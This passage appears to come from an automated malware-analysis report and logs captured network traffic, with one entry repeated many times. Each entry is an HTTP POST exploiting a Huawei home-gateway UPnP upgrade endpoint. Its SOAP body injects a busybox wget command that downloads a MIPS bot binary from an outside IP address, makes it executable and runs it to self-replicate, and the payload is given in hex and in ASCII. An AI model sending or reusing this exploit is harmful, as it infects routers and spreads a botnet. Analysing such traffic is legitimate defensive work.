70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 